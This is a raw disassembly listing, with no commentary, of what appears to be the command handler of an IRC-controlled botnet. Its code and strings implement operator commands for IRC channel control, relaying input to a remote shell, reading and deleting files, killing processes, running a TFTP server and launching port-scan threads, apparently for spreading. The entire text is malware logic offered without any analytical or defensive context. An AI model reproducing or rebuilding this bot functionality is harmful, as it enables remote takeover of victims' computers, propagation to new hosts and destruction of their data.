call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_404592
push esi
push edi
push offset aCloneModeSS ; "[CLONE]: Mode (%s): %s"
jmp loc_40A8FB
; ---------------------------------------------------------------------------
loc_40A98B: ; CODE XREF: sub_4078FA+203B�j
; sub_4078FA+204F�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_10]
push [ebp+var_14]
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
mov edi, [ebp+var_8]
push edi
call sub_412F42
test eax, eax
pop ecx
jle loc_40CFE2
push edi
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
push esi
push offset aS_4 ; "%s\r\n"
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_404592
push esi
push edi
push offset aCloneRawSS ; "[CLONE]: Raw (%s): %s"
jmp loc_40A8FB
; ---------------------------------------------------------------------------
loc_40A9FA: ; CODE XREF: sub_4078FA+2013�j
; sub_4078FA+2027�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_8]
push [ebp+var_14]
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
push esi
push offset aModeS_0 ; "MODE %s\r\n"
push [ebp+arg_4]
call sub_404592
push esi
push offset aMainModeChange ; "[MAIN]: Mode change: %s"
jmp loc_40B2C5
; ---------------------------------------------------------------------------
loc_40AA34: ; CODE XREF: sub_4078FA+1FEB�j
; sub_4078FA+1FFF�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor eax, eax
repe cmpsb
jz loc_407B7B
push [ebp+var_10]
push offset aPartS ; "PART %s\r\n"
push [ebp+arg_4]
call sub_404592
push [ebp+var_8]
call sub_412F42
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_41F000
push [ebp+ebx+var_98]
push [ebp+var_10]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_404592
push offset aMainCycle_ ; "[MAIN]: Cycle."
call sub_401C33
jmp loc_40B2CA
; ---------------------------------------------------------------------------
loc_40AA9A: ; CODE XREF: sub_4078FA+1FC3�j
; sub_4078FA+1FD7�j
cmp [ebp+var_14], 0
jz loc_40CFE2
lea edx, [eax+1]
loc_40AAA7: ; CODE XREF: sub_4078FA+31B2�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40AAA7
sub eax, edx
mov ecx, eax
mov eax, [ebp+var_8]
lea esi, [eax+1]
loc_40AAB8: ; CODE XREF: sub_4078FA+31C3�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40AAB8
push [ebp+var_10]
sub eax, esi
add eax, ecx
mov ecx, [ebp+var_14]
lea eax, [eax+ecx+2]
push eax
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
push esi
lea eax, [ebp+var_2E0]
push offset dword_425A58
push eax
call sub_412BB5
push 0
push 0
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_8]
push [ebp+arg_4]
call sub_4045DD
push esi
push [ebp+var_8]
push offset aMainActionSS_ ; "[MAIN]: Action: %s: %s."
call sub_401CA7
add esp, 2Ch
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40AB1D: ; CODE XREF: sub_4078FA+1F9B�j
; sub_4078FA+1FAF�j
cmp [ebp+var_14], 0
jz loc_40CFE2
lea edx, [eax+1]
loc_40AB2A: ; CODE XREF: sub_4078FA+3235�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40AB2A
sub eax, edx
mov ecx, eax
mov eax, [ebp+var_8]
lea esi, [eax+1]
loc_40AB3B: ; CODE XREF: sub_4078FA+3246�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40AB3B
push [ebp+var_10]
sub eax, esi
add eax, ecx
mov ecx, [ebp+var_14]
lea eax, [eax+ecx+2]
push eax
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
push 0
push 0
push esi
push [ebp+var_8]
push [ebp+arg_4]
call sub_4045DD
push esi
push [ebp+var_8]
push offset aMainPrivmsgSS_ ; "[MAIN]: Privmsg: %s: %s."
call sub_401CA7
loc_40AB80: ; CODE XREF: sub_4078FA+52BC�j
add esp, 20h
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40AB88: ; CODE XREF: sub_4078FA+1F73�j
; sub_4078FA+1F87�j
cmp [ebp+var_14], 0
jz loc_407B7B
push [ebp+var_10]
push [ebp+var_14]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz loc_407B7B
push eax
push [ebp+var_8]
call sub_401B23
push [ebp+var_8]
lea eax, [ebp+var_2E0]
push offset aMainAliasAdded ; "[MAIN]: Alias added: %s."
push eax
call sub_412BB5
add esp, 14h
loc_40ABC7: ; CODE XREF: sub_4078FA+38BC�j
; sub_4078FA+4C47�j
cmp [ebp+var_C], 0
jnz short loc_40ABEA
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40ABEA: ; CODE XREF: sub_4078FA+32D1�j
; sub_4078FA+4405�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
jmp loc_40D1A1
; ---------------------------------------------------------------------------
loc_40ABFB: ; CODE XREF: sub_4078FA+1E33�j
; sub_4078FA+1E47�j
push [ebp+var_8]
push [ebp+arg_1C]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz loc_40CFE2
mov ebx, [ebp+ebx+var_9C]
test ebx, ebx
jz short loc_40AC96
push ebx
push [ebp+var_14]
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
lea eax, [ebp+var_2E0]
jz short loc_40AC84
push esi
push [ebp+var_9C]
push [ebp+var_A0]
push [ebp+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_412BB5
push 1FFh
lea eax, [ebp+var_2E0]
push eax
push [ebp+arg_0]
call sub_412C40
push esi
push [ebp+var_8]
lea eax, [ebp+var_2E0]
push offset aMainGethostSCo ; "[MAIN]: Gethost: %s, Command: %s"
push eax
call sub_412BB5
add esp, 34h
inc [ebp+arg_24]
jmp loc_40AE37
; ---------------------------------------------------------------------------
loc_40AC84: ; CODE XREF: sub_4078FA+3336�j
push offset aMainUnableToEx ; "[MAIN]: Unable to extract Gethost comma"...
push eax
call sub_412BB5
pop ecx
pop ecx
jmp loc_40AE37
; ---------------------------------------------------------------------------
loc_40AC96: ; CODE XREF: sub_4078FA+331F�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_410086
add esp, 0Ch
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
push [ebp+var_8]
lea eax, [ebp+var_2E0]
push offset aMainGethostS_ ; "[MAIN]: Gethost: %s."
push 200h
push eax
call sub_412E0D
add esp, 24h
jmp loc_40AE37
; ---------------------------------------------------------------------------
loc_40ACE0: ; CODE XREF: sub_4078FA+1B62�j
; sub_4078FA+1B76�j
push offset aR ; "r"
push [ebp+var_8]
call sub_413393
mov edi, eax
test edi, edi
pop ecx
pop ecx
lea eax, [ebp+var_2E0]
jz short loc_40AD5E
push edi
mov esi, 200h
push esi
push eax
call sub_4142F5
add esp, 0Ch
jmp short loc_40AD38
; ---------------------------------------------------------------------------
loc_40AD0D: ; CODE XREF: sub_4078FA+3440�j
push 1
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
push edi
lea eax, [ebp+var_2E0]
push esi
push eax
call sub_4142F5
add esp, 20h
loc_40AD38: ; CODE XREF: sub_4078FA+3411�j
test eax, eax
jnz short loc_40AD0D
push edi
call sub_412F93
push [ebp+var_8]
lea eax, [ebp+var_2E0]
push offset aMainReadFileCo ; "[MAIN]: Read file complete: %s"
push eax
call sub_412BB5
add esp, 10h
jmp loc_40AE37
; ---------------------------------------------------------------------------
loc_40AD5E: ; CODE XREF: sub_4078FA+33FF�j
push [ebp+var_8]
push offset aMainReadFileFa ; "[MAIN]: Read file failed: %s"
loc_40AD66: ; CODE XREF: sub_4078FA+2F07�j
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40AE14
; ---------------------------------------------------------------------------
loc_40AD74: ; CODE XREF: sub_4078FA+1B3A�j
; sub_4078FA+1B4E�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_8]
push [ebp+var_14]
call sub_413920
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_40CFE2
mov edi, ebx
dec edi
loc_40AD98: ; CODE XREF: sub_4078FA+34A4�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40AD98
mov esi, offset asc_420328 ; "\n"
push ebx
movsw
call sub_40DB6D
test eax, eax
pop ecx
lea eax, [ebp+var_2E0]
jnz short loc_40ADBF
push offset aCmdErrorSendin ; "[CMD]: Error sending to remote shell."
jmp short loc_40AE0C
; ---------------------------------------------------------------------------
loc_40ADBF: ; CODE XREF: sub_4078FA+34BC�j
push ebx
push offset aCmdCommandsS ; "[CMD]: Commands: %s"
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_40AE37
; ---------------------------------------------------------------------------
loc_40ADD0: ; CODE XREF: sub_4078FA+1B12�j
; sub_4078FA+1B26�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_8]
push [ebp+var_14]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz loc_40CFE2
push eax
call sub_4057CD
test eax, eax
pop ecx
lea eax, [ebp+var_2E0]
jnz short loc_40AE07
push offset aMircClientNotO ; "[mIRC]: Client not open."
jmp short loc_40AE0C
; ---------------------------------------------------------------------------
loc_40AE07: ; CODE XREF: sub_4078FA+3504�j
push offset aMircCommandSen ; "[mIRC]: Command sent."
loc_40AE0C: ; CODE XREF: sub_4078FA+1C34�j
; sub_4078FA+1C3E�j ...
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40AE14: ; CODE XREF: sub_4078FA+1BAF�j
; sub_4078FA+1C0C�j ...
cmp [ebp+var_C], 0
jnz short loc_40AE37
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40AE37: ; CODE XREF: sub_4078FA+3385�j
; sub_4078FA+3397�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
pop ecx
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40AE49: ; CODE XREF: sub_4078FA+1AEA�j
; sub_4078FA+1AFE�j
push 0
push [ebp+var_9C]
push [ebp+arg_4]
push [ebp+var_8]
call sub_4030C4
push [ebp+var_8]
push offset aFileListS ; "[FILE]: List: %s"
jmp loc_40A8FB
; ---------------------------------------------------------------------------
loc_40AE69: ; CODE XREF: sub_4078FA+1AC2�j
; sub_4078FA+1AD6�j
push 20h
push [ebp+var_8]
call ds:dword_41F0A0
push [ebp+var_8]
call ds:dword_41F0B8
test eax, eax
jz short loc_40AE8B
push [ebp+var_8]
push offset aFileDeletedS_0 ; "[FILE]: Deleted '%s'."
jmp short loc_40AE96
; ---------------------------------------------------------------------------
loc_40AE8B: ; CODE XREF: sub_4078FA+3585�j
push offset aFile ; "[FILE]:"
call sub_405708
push eax
loc_40AE96: ; CODE XREF: sub_4078FA+358F�j
lea eax, [ebp+var_2E0]
push 200h
push eax
call sub_412E0D
loc_40AEA7: ; CODE XREF: sub_4078FA+36F0�j
add esp, 10h
loc_40AEAA: ; CODE XREF: sub_4078FA+3708�j
; sub_4078FA+4ABC�j
cmp [ebp+var_C], 0
jnz loc_409015
push 0
jmp loc_408FFA
; ---------------------------------------------------------------------------
loc_40AEBB: ; CODE XREF: sub_4078FA+1A9A�j
; sub_4078FA+1AAE�j
push [ebp+var_8]
call sub_412F42
push eax
call sub_4074C6
xor esi, esi
pop ecx
inc esi
pop ecx
push [ebp+var_8]
cmp eax, esi
lea eax, [ebp+var_2E0]
jnz short loc_40AEE2
push offset aProcProcessKil ; "[PROC]: Process killed ID: %s"
jmp short loc_40AEE7
; ---------------------------------------------------------------------------
loc_40AEE2: ; CODE XREF: sub_4078FA+35DF�j
push offset aProcFailedToTe ; "[PROC]: Failed to terminate process ID:"...
loc_40AEE7: ; CODE XREF: sub_4078FA+35E6�j
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_C], 0
jnz loc_409018
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
jmp loc_409018
; ---------------------------------------------------------------------------
loc_40AF1C: ; CODE XREF: sub_4078FA+1A72�j
; sub_4078FA+1A86�j
push 1
xor esi, esi
push esi
push esi
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4070E8
add esp, 1Ch
cmp eax, 1
jnz short loc_40AF55
push [ebp+var_8]
push offset aProcProcessK_0 ; "[PROC]: Process killed & deleted: %s"
loc_40AF46: ; CODE XREF: sub_4078FA+299B�j
lea eax, [ebp+var_2E0]
loc_40AF4C: ; CODE XREF: sub_4078FA+2BCF�j
; sub_4078FA+3694�j ...
push eax
call sub_412BB5
add esp, 0Ch
loc_40AF55: ; CODE XREF: sub_4078FA+29B0�j
; sub_4078FA+2B73�j ...
cmp [ebp+var_C], esi
jnz loc_409015
push esi
jmp loc_408FFA
; ---------------------------------------------------------------------------
loc_40AF64: ; CODE XREF: sub_4078FA+1A4A�j
; sub_4078FA+1A5E�j
xor esi, esi
push esi
push esi
push esi
push [ebp+var_8]
push [ebp+var_4]
push esi
push [ebp+arg_4]
call sub_4070E8
add esp, 1Ch
push [ebp+var_8]
cmp eax, 1
lea eax, [ebp+var_2E0]
jnz short loc_40AF90
push offset aProcProcessK_1 ; "[PROC]: Process killed: %s"
jmp short loc_40AF4C
; ---------------------------------------------------------------------------
loc_40AF90: ; CODE XREF: sub_4078FA+368D�j
push offset aProcFailedTo_0 ; "[PROC]: Failed to terminate process: %s"...
jmp short loc_40AF4C
; ---------------------------------------------------------------------------
loc_40AF97: ; CODE XREF: sub_4078FA+1A22�j
; sub_4078FA+1A36�j
mov esi, [ebp+var_8]
push esi
call dword_433514
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40AFBF
push 2
push 4
lea eax, [ebp+arg_0]
push eax
call dword_433590
test eax, eax
jz short loc_40AFEF
push dword ptr [eax]
jmp short loc_40AFD8
; ---------------------------------------------------------------------------
loc_40AFBF: ; CODE XREF: sub_4078FA+36AD�j
push esi
call dword_433500
test eax, eax
jz short loc_40AFEF
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_433520
push eax
loc_40AFD8: ; CODE XREF: sub_4078FA+36C3�j
push esi
lea eax, [ebp+var_2E0]
push offset aDnsLookupSS_ ; "[DNS]: Lookup: %s -> %s."
push eax
call sub_412BB5
jmp loc_40AEA7
; ---------------------------------------------------------------------------
loc_40AFEF: ; CODE XREF: sub_4078FA+36BF�j
; sub_4078FA+36CE�j
lea eax, [ebp+var_2E0]
push offset aDnsCouldnTReso ; "[DNS]: Couldn't resolve hostname."
push eax
call sub_412BB5
pop ecx
pop ecx
jmp loc_40AEAA
; ---------------------------------------------------------------------------
loc_40B007: ; CODE XREF: sub_4078FA+19FA�j
; sub_4078FA+1A0E�j
push 7Fh
push [ebp+var_8]
push [ebp+arg_14]
call sub_412C40
push [ebp+var_8]
lea eax, [ebp+var_2E0]
push offset aMainServerChan ; "[MAIN]: Server changed to: '%s'."
push eax
call sub_412BB5
add esp, 18h
jmp loc_40C47E
; ---------------------------------------------------------------------------
loc_40B030: ; CODE XREF: sub_4078FA+19D2�j
; sub_4078FA+19E6�j
push 5
xor esi, esi
push esi
push esi
push [ebp+var_8]
push offset aOpen ; "open"
push esi
call dword_4335A8
push [ebp+var_8]
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_40B05C
push offset aShellFileOpene ; "[SHELL]: File opened: %s"
jmp loc_40AF4C
; ---------------------------------------------------------------------------
loc_40B05C: ; CODE XREF: sub_4078FA+3756�j
push offset aShellCouldnTOp ; "[SHELL]: Couldn't open file: %s"
jmp loc_40AF4C
; ---------------------------------------------------------------------------
loc_40B066: ; CODE XREF: sub_4078FA+19AA�j
; sub_4078FA+19BE�j
mov eax, [ebp+var_8]
mov cl, [eax]
mov byte_42AE5C, cl
movsx eax, byte ptr [eax]
push eax
push offset aMainPrefixChan ; "[MAIN]: Prefix changed to: '%c'."
jmp loc_40C46F
; ---------------------------------------------------------------------------
loc_40B07F: ; CODE XREF: sub_4078FA+1982�j
; sub_4078FA+1996�j
push [ebp+var_8]
call sub_412F42
test eax, eax
pop ecx
jle loc_40CFE2
push [ebp+var_8]
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
push 0
push 0
lea eax, [ebp+var_B8]
push 2
push eax
call sub_40E7B0
push eax
lea eax, [ebp+var_2E0]
push offset aNickS ; "NICK %s"
push eax
call sub_412BB5
add esp, 1Ch
jmp loc_40A841
; ---------------------------------------------------------------------------
loc_40B0D0: ; CODE XREF: sub_4078FA+195A�j
; sub_4078FA+196E�j
mov edi, [ebp+var_8]
push edi
call sub_412F42
test eax, eax
pop ecx
jle loc_407B7B
push edi
call sub_412F42
mov esi, 1F4h
cmp eax, esi
pop ecx
jge loc_407B7B
push offset aQuitLater ; "QUIT :later\r\n"
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_404592
pop ecx
pop ecx
push esi
call ds:dword_41F000
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call dword_4335AC
push [ebp+var_18]
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_43434C[eax]
call ds:dword_41F0C8
push edi
call sub_412F42
imul eax, 234h
and dword_43434C[eax], 0
push edi
call sub_412F42
imul eax, 234h
and byte ptr dword_434138[eax], 0
pop ecx
pop ecx
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40B17E: ; CODE XREF: sub_4078FA+1932�j
; sub_4078FA+1946�j
mov edi, [ebp+var_8]
push 4
mov esi, offset aAll ; "all"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B1BB
call sub_41105B
test eax, eax
jle short loc_40B1A3
push eax
push offset aThreadsStopped ; "[THREADS]: Stopped: %d thread(s)."
jmp loc_40C532
; ---------------------------------------------------------------------------
loc_40B1A3: ; CODE XREF: sub_4078FA+389C�j
push offset aThreadsNoActiv ; "[THREADS]: No active threads found."
loc_40B1A8: ; CODE XREF: sub_4078FA+420E�j
; sub_4078FA+422D�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
pop ecx
pop ecx
jmp loc_40ABC7
; ---------------------------------------------------------------------------
loc_40B1BB: ; CODE XREF: sub_4078FA+3893�j
mov edi, [ebp+var_1C]
jmp short loc_40B22D
; ---------------------------------------------------------------------------
loc_40B1C0: ; CODE XREF: sub_4078FA+3937�j
mov esi, [ebp+edi*4+var_A4]
test esi, esi
jz loc_407B7B
push esi
call sub_412F42
push eax
call sub_410FD3
pop ecx
pop ecx
test eax, eax
push esi
lea eax, [ebp+var_2E0]
jz short loc_40B1EF
push offset aThreadsKilledT ; "[THREADS]: Killed thread: %s."
jmp short loc_40B1F4
; ---------------------------------------------------------------------------
loc_40B1EF: ; CODE XREF: sub_4078FA+38EC�j
push offset aThreadsFailedT ; "[THREADS]: Failed to kill thread: %s."
loc_40B1F4: ; CODE XREF: sub_4078FA+38F3�j
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40B220
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40B220: ; CODE XREF: sub_4078FA+3907�j
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
pop ecx
loc_40B22D: ; CODE XREF: sub_4078FA+38C4�j
inc edi
cmp edi, 20h
jb short loc_40B1C0
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40B238: ; CODE XREF: sub_4078FA+190A�j
; sub_4078FA+191E�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_8]
push [ebp+var_14]
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
push esi
push offset aS_4 ; "%s\r\n"
push [ebp+arg_4]
call sub_404592
push esi
push offset aMainIrcRawS_ ; "[MAIN]: IRC Raw: %s."
jmp short loc_40B2C5
; ---------------------------------------------------------------------------
loc_40B26F: ; CODE XREF: sub_4078FA+18E2�j
; sub_4078FA+18F6�j
push [ebp+var_8]
push offset aPartS ; "PART %s\r\n"
push [ebp+arg_4]
call sub_404592
push [ebp+var_8]
push offset aMainPartedChan ; "[MAIN]: Parted channel: '%s'."
jmp short loc_40B2C5
; ---------------------------------------------------------------------------
loc_40B289: ; CODE XREF: sub_4078FA+18BA�j
; sub_4078FA+18CE�j
push [ebp+ebx+var_9C]
push [ebp+var_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_404592
push [ebp+var_8]
push offset aMainJoinedCh_0 ; "[MAIN]: Joined channel: '%s'."
jmp loc_40A8FB
; ---------------------------------------------------------------------------
loc_40B2AD: ; CODE XREF: sub_4078FA+1892�j
; sub_4078FA+18A6�j
push [ebp+var_8]
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_404592
push [ebp+var_8]
push offset aMainNickChange ; "[MAIN]: Nick changed to: '%s'."
loc_40B2C5: ; CODE XREF: sub_4078FA+3135�j
; sub_4078FA+3973�j ...
call sub_401CA7
loc_40B2CA: ; CODE XREF: sub_4078FA+319B�j
add esp, 14h
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40B2D2: ; CODE XREF: sub_4078FA+1858�j
; sub_4078FA+186C�j
mov cl, byte_42A1B2
and [ebp+arg_0], 0
test cl, cl
mov edx, offset byte_42A1B2
jz loc_407B7B
mov eax, edx
loc_40B2EB: ; CODE XREF: sub_4078FA+39FA�j
inc [ebp+arg_0]
add eax, 0Bh
cmp byte ptr [eax], 0
jnz short loc_40B2EB
test cl, cl
jz loc_407B7B
mov [ebp+var_1C], edx
loc_40B301: ; CODE XREF: sub_4078FA+3CDE�j
push 9
call sub_4110DA
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_0]
add eax, ecx
cmp eax, 258h
jle short loc_40B351
push ecx
lea eax, [ebp+var_2E0]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 20h
jmp loc_40B5CE
; ---------------------------------------------------------------------------
loc_40B351: ; CODE XREF: sub_4078FA+3A21�j
or [ebp+var_4C8], 0FFFFFFFFh
xor esi, esi
cmp dword_42A068, esi
mov [ebp+var_4CC], 0C8h
mov [ebp+var_4E0], 5
mov [ebp+var_4DC], esi
mov [ebp+arg_0], esi
jz short loc_40B3E4
mov edx, [ebp+var_1C]
add edx, 0FFFFFFF6h
mov edi, offset dword_42A068
loc_40B38A: ; CODE XREF: sub_4078FA+3ACC�j
mov esi, edx
lea eax, [edi-28h]
loc_40B38F: ; CODE XREF: sub_4078FA+3AB1�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_40B3B3
test cl, cl
jz short loc_40B3AD
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_40B3B3
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40B38F
loc_40B3AD: ; CODE XREF: sub_4078FA+3A9F�j
xor esi, esi
xor eax, eax
jmp short loc_40B3BA
; ---------------------------------------------------------------------------
loc_40B3B3: ; CODE XREF: sub_4078FA+3A9B�j
; sub_4078FA+3AA9�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
xor esi, esi
loc_40B3BA: ; CODE XREF: sub_4078FA+3AB7�j
cmp eax, esi
jz short loc_40B3CA
inc [ebp+arg_0]
add edi, 3Ch
cmp [edi], esi
jnz short loc_40B38A
jmp short loc_40B3E4
; ---------------------------------------------------------------------------
loc_40B3CA: ; CODE XREF: sub_4078FA+3AC2�j
mov eax, [ebp+arg_0]
mov ecx, eax
imul ecx, 3Ch
mov ecx, dword_42A068[ecx]
mov [ebp+var_4E4], ecx
mov [ebp+var_4C8], eax
loc_40B3E4: ; CODE XREF: sub_4078FA+3A83�j
; sub_4078FA+3ACE�j
cmp [ebp+var_4E4], esi
jz loc_40B5F5
push 10h
pop esi
lea eax, [ebp+var_A8]
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_4]
mov [ebp+var_A8], esi
call dword_433418
mov al, [ebp+var_44B]
neg al
push esi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+var_C4], eax
push [ebp+var_C4]
call dword_433520
push eax
lea eax, [ebp+var_67C]
push eax
call sub_412C40
xor eax, eax
cmp [ebp+var_44B], al
push 30h
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_67C]
push eax
call sub_412C10
add esp, 14h
xor bl, bl
test esi, esi
jle short loc_40B48A
loc_40B46A: ; CODE XREF: sub_4078FA+3B8E�j
test eax, eax
jz short loc_40B48A
mov byte ptr [eax], 78h
lea eax, [ebp+var_67C]
push 30h
push eax
call sub_412C10
pop ecx
inc bl
pop ecx
movsx ecx, bl
cmp ecx, esi
jl short loc_40B46A
loc_40B48A: ; CODE XREF: sub_4078FA+3B6E�j
; sub_4078FA+3B72�j
mov eax, [ebp+arg_4]
push [ebp+var_9C]
mov [ebp+var_4E8], eax
mov eax, [ebp+var_4]
mov [ebp+var_4C0], eax
mov eax, [ebp+var_C]
mov [ebp+var_4BC], eax
mov ebx, 80h
lea eax, [ebp+var_5E8]
push ebx
push eax
mov [ebp+var_4B8], 1
call sub_412E0D
xor ecx, ecx
add esp, 0Ch
mov eax, offset aMurders ; "#murders"
inc ecx
mov edi, 41FA76h
mov esi, eax
xor edx, edx
repe cmpsb
jz short loc_40B4F2
push eax
lea eax, [ebp+var_568]
push ebx
push eax
call sub_412E0D
add esp, 0Ch
jmp short loc_40B4F9
; ---------------------------------------------------------------------------
loc_40B4F2: ; CODE XREF: sub_4078FA+3BE3�j
and [ebp+var_568], 0
loc_40B4F9: ; CODE XREF: sub_4078FA+3BF6�j
xor esi, esi
cmp [ebp+var_4B8], esi
mov eax, offset aRandom ; "Random"
jnz short loc_40B50D
mov eax, offset aSequential ; "Sequential"
loc_40B50D: ; CODE XREF: sub_4078FA+3C0C�j
push [ebp+var_4CC]
lea ecx, [ebp+var_67C]
push [ebp+var_4DC]
push [ebp+var_4E0]
push [ebp+var_4E4]
push ecx
push eax
lea eax, [ebp+var_2E0]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax
call sub_412BB5
push esi
lea eax, [ebp+var_2E0]
push 9
push eax
call sub_410EEA
add esp, 2Ch
mov [ebp+var_4D8], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_67C]
push eax
push offset sub_4018D1
push esi
push esi
call ds:dword_41F00C
mov ecx, [ebp+var_4D8]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40B5EB
call ds:dword_41F008
push eax
lea eax, [ebp+var_2E0]
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
push eax
call sub_412BB5
add esp, 0Ch
loc_40B5A0: ; CODE XREF: sub_4078FA+3CF9�j
cmp [ebp+var_C], esi
jnz short loc_40B5C1
push esi
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40B5C1: ; CODE XREF: sub_4078FA+3CA9�j
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
pop ecx
loc_40B5CE: ; CODE XREF: sub_4078FA+3A52�j
add [ebp+var_1C], 0Bh
mov eax, [ebp+var_1C]
cmp byte ptr [eax], 0
jnz loc_40B301
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40B5E3: ; CODE XREF: sub_4078FA+3CF7�j
push 32h
call ds:dword_41F000
loc_40B5EB: ; CODE XREF: sub_4078FA+3C89�j
cmp [ebp+var_4B4], esi
jz short loc_40B5E3
jmp short loc_40B5A0
; ---------------------------------------------------------------------------
loc_40B5F5: ; CODE XREF: sub_4078FA+3AF0�j
lea eax, [ebp+var_2E0]
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan, port is i"...
push eax
call sub_412BB5
pop ecx
pop ecx
jmp loc_40CA03
; ---------------------------------------------------------------------------
loc_40B60D: ; CODE XREF: sub_4078FA+1830�j
; sub_4078FA+1844�j
push 5
call sub_4110DA
test eax, eax
pop ecx
jle short loc_40B631
push offset aTftpAlreadyRun ; "[TFTP]: Already running."
loc_40B61E: ; CODE XREF: sub_4078FA+4E26�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
xor edi, edi
jmp loc_40C8BE
; ---------------------------------------------------------------------------
loc_40B631: ; CODE XREF: sub_4078FA+3D1D�j
mov eax, [ebp+ebx+var_A0]
xor edi, edi
cmp eax, edi
mov esi, 104h
jz short loc_40B656
push eax
lea eax, [ebp+var_74C]
push esi
push eax
call sub_412E0D
add esp, 0Ch
jmp short loc_40B665
; ---------------------------------------------------------------------------
loc_40B656: ; CODE XREF: sub_4078FA+3D47�j
push esi
